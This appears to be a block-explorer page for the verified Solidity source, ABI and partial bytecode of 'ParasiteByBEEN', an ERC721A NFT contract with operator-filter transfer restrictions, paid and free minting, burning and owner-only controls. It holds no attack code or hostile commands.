                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);
    address public owner;

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract ParasiteByBEEN is ERC721A, TheOperatorFilterer {

    string uri = "ipfs://bafybeiflcsrfbgtmkgu3gekz5bbgw74jdyrvt2djbkpgxgdmkatzmlszji/";

    uint256 public maxSupply = 550;

    uint256 public mintPrice = 0.002 ether;

    uint256 public maxFreeMintAmountPerTx = 1;

    uint256 public maxMintAmountPerWallet = 10;

    mapping(address => uint256) private _userForFree;

    mapping(uint256 => uint256) private _userMinted;

    function publicMint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        _mint(amount);
    }

    function _mint(uint256 amount) internal {
        if (msg.value == 0) {
            require(amount == 1);
            if (totalSupply() > maxSupply / 5) {
                require(_userMinted[block.number] < FreeNum() 
                && _userForFree[tx.origin] < maxFreeMintAmountPerTx );
                _userForFree[tx.origin]++;
                _userMinted[block.number]++;
            }
            _safeMint(msg.sender, 1);
        } else {
            require(msg.value >= mintPrice * amount);
            _safeMint(msg.sender, amount);
        }
    }

    function reserve(address addr, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(addr, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("Parasite By BEEN", "PBB") {
        owner = msg.sender;
        maxMintAmountPerWallet = 10;
    }

    function setURi(string memory u) public onlyOwner {
        uri = u;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked(uri, _toString(tokenId), ".json"));
    }

    function setFreePerAddr(uint256 maxTx, uint256 maxS) external onlyOwner {
        maxFreeMintAmountPerTx = maxTx;
        maxSupply = maxS;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function royaltyInfo(uint256 _tokenId, uint256 _salePrice) public view virtual returns (address, uint256) {
        uint256 royaltyAmount = (_salePrice * 50) / 1000;
        return (owner, royaltyAmount);
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreeMintAmountPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxMintAmountPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mintPrice","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"publicMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"reserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"uint256","name":"_salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"},{"internalType":"uint256","name":"maxS","type":"uint256"}],"name":"setFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"u","type":"string"}],"name":"setURi","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526040518060800160405280604381526020016200380160439139600990816200002e9190620005dc565b50610226600a5566071afd498d0000600b556001600c55600a600d553480156200005757600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280601081526020017f5061726173697465204279204245454e000000000000000000000000000000008152506040518060400160405280600381526020017f50424200000000000000000000000000000000000000000000000000000000008152508160029081620000ec9190620005dc565b508060039081620000fe9190620005dc565b506200010f6200035d60201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156200030c578015620001d2576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b81526004016200019892919062000708565b600060405180830381600087803b158015620001b357600080fd5b505af1158015620001c8573d6000803e3d6000fd5b505050506200030b565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146200028c576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200025292919062000708565b600060405180830381600087803b1580156200026d57600080fd5b505af115801562000282573d6000803e3d6000fd5b505050506200030a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002d5919062000735565b600060405180830381600087803b158015620002f057600080fd5b505af115801562000305573d6000803e3d6000fd5b505050505b5b5b505033600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600a600d8190555062000752565b600090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003e457607f821691505b602082108103620003fa57620003f96200039c565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004647fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000425565b62000470868362000425565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004bd620004b7620004b18462000488565b62000492565b62000488565b9050919050565b6000819050919050565b620004d9836200049c565b620004f1620004e882620004c4565b84845462000432565b825550505050565b600090565b62000508620004f9565b62000515818484620004ce565b505050565b5b818110156200053d5762000531600082620004fe565b6001810190506200051b565b5050565b601f8211156200058c57620005568162000400565b620005618462000415565b8101602085101562000571578190505b62000589620005808562000415565b8301826200051a565b50505b505050565b600082821c905092915050565b6000620005b16000198460080262000591565b1980831691505092915050565b6000620005cc83836200059e565b9150826002028217905092915050565b620005e78262000362565b67ffffffffffffffff8111156200060357620006026200036d565b5b6200060f8254620003cb565b6200061c82828562000541565b600060209050601f8311600181146200065457600084156200063f578287015190505b6200064b8582620005be565b865550620006bb565b601f198416620006648662000400565b60005b828110156200068e5784890151825560018201915060208501945060208101905062000667565b86831015620006ae5784890151620006aa601f8916826200059e565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620006f082620006c3565b9050919050565b6200070281620006e3565b82525050565b60006040820190506200071f6000830185620006f7565b6200072e6020830184620006f7565b9392505050565b60006020820190506200074c6000830184620006f7565b92915050565b61309f80620007626000396000f3fe60806040526004361061019c5760003560e01c806342842e0e116100ec578063a22cb4651161008a578063c87b56dd11610064578063c87b56dd14610572578063cc47a40b146105af578063d5abeb01146105d8578063e985e9c5146106035761019c565b8063a22cb46514610502578063b88d4fde1461052b578063bc951b91146105475761019c565b80636817c76c116100c65780636817c76c1461044457806370a082311461046f5780638da5cb5b146104ac57806395d89b41146104d75761019c565b806342842e0e146103c0578063604906dc146103dc5780636352211e146104075761019c565b806323b872dd1161015957806338b08fd41161013357806338b08fd41461032c5780633a233f89146103555780633ccfd60b1461037e57806341f43434146103955761019c565b806323b872dd146102b65780632a55205a146102d25780632db11544146103105761019c565b806301ffc9a7146101a1578063028043b1146101de57806306fdde0314610207578063081812fc14610232578063095ea7b31461026f57806318160ddd1461028b575b600080fd5b3480156101ad57600080fd5b506101c860048036038101906101c39190612271565b610640565b6040516101d591906122b9565b60405180910390f35b3480156101ea57600080fd5b506102056004803603810190610200919061241a565b6106d2565b005b34801561021357600080fd5b5061021c61073f565b60405161022991906124e2565b60405180910390f35b34801561023e57600080fd5b506102596004803603810190610254919061253a565b6107d1565b60405161026691906125a8565b60405180910390f35b610289600480360381019061028491906125ef565b610850565b005b34801561029757600080fd5b506102a061095a565b6040516102ad919061263e565b60405180910390f35b6102d060048036038101906102cb9190612659565b610971565b005b3480156102de57600080fd5b506102f960048036038101906102f491906126ac565b610ac1565b6040516103079291906126ec565b60405180910390f35b61032a6004803603810190610325919061253a565b610b12565b005b34801561033857600080fd5b50610353600480360381019061034e91906126ac565b610b3f565b005b34801561036157600080fd5b5061037c60048036038101906103779190612715565b610bab565b005b34801561038a57600080fd5b50610393610c14565b005b3480156103a157600080fd5b506103aa610cb7565b6040516103b791906127b4565b60405180910390f35b6103da60048036038101906103d59190612659565b610cc9565b005b3480156103e857600080fd5b506103f1610e19565b6040516103fe919061263e565b60405180910390f35b34801561041357600080fd5b5061042e6004803603810190610429919061253a565b610e1f565b60405161043b91906125a8565b60405180910390f35b34801561045057600080fd5b50610459610e31565b604051610466919061263e565b60405180910390f35b34801561047b57600080fd5b50610496600480360381019061049191906127cf565b610e37565b6040516104a3919061263e565b60405180910390f35b3480156104b857600080fd5b506104c1610eef565b6040516104ce91906125a8565b60405180910390f35b3480156104e357600080fd5b506104ec610f15565b6040516104f991906124e2565b60405180910390f35b34801561050e57600080fd5b5061052960048036038101906105249190612828565b610fa7565b005b61054560048036038101906105409190612909565b6110b1565b005b34801561055357600080fd5b5061055c611204565b604051610569919061263e565b60405180910390f35b34801561057e57600080fd5b506105996004803603810190610594919061253a565b61120a565b6040516105a691906124e2565b60405180910390f35b3480156105bb57600080fd5b506105d660048036038101906105d191906125ef565b61123e565b005b3480156105e457600080fd5b506105ed6112c7565b6040516105fa919061263e565b60405180910390f35b34801561060f57600080fd5b5061062a60048036038101906106259190612715565b6112cd565b60405161063791906122b9565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061069b57506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106cb5750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461072c57600080fd5b806009908161073b9190612b8e565b5050565b60606002805461074e906129bb565b80601f016020809104026020016040519081016040528092919081815260200182805461077a906129bb565b80156107c75780601f1061079c576101008083540402835291602001916107c7565b820191906000526020600020905b8154815290600101906020018083116107aa57829003601f168201915b5050505050905090565b60006107dc82611361565b610812576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561094b576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016108c8929190612c60565b602060405180830381865afa1580156108e5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109099190612c9e565b61094a57806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161094191906125a8565b60405180910390fd5b5b61095583836113c0565b505050565b6000610964611504565b6001546000540303905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610aaf573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109e3576109de848484611509565b610abb565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610a2c929190612c60565b602060405180830381865afa158015610a49573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a6d9190612c9e565b610aae57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610aa591906125a8565b60405180910390fd5b5b610aba848484611509565b5b50505050565b6000806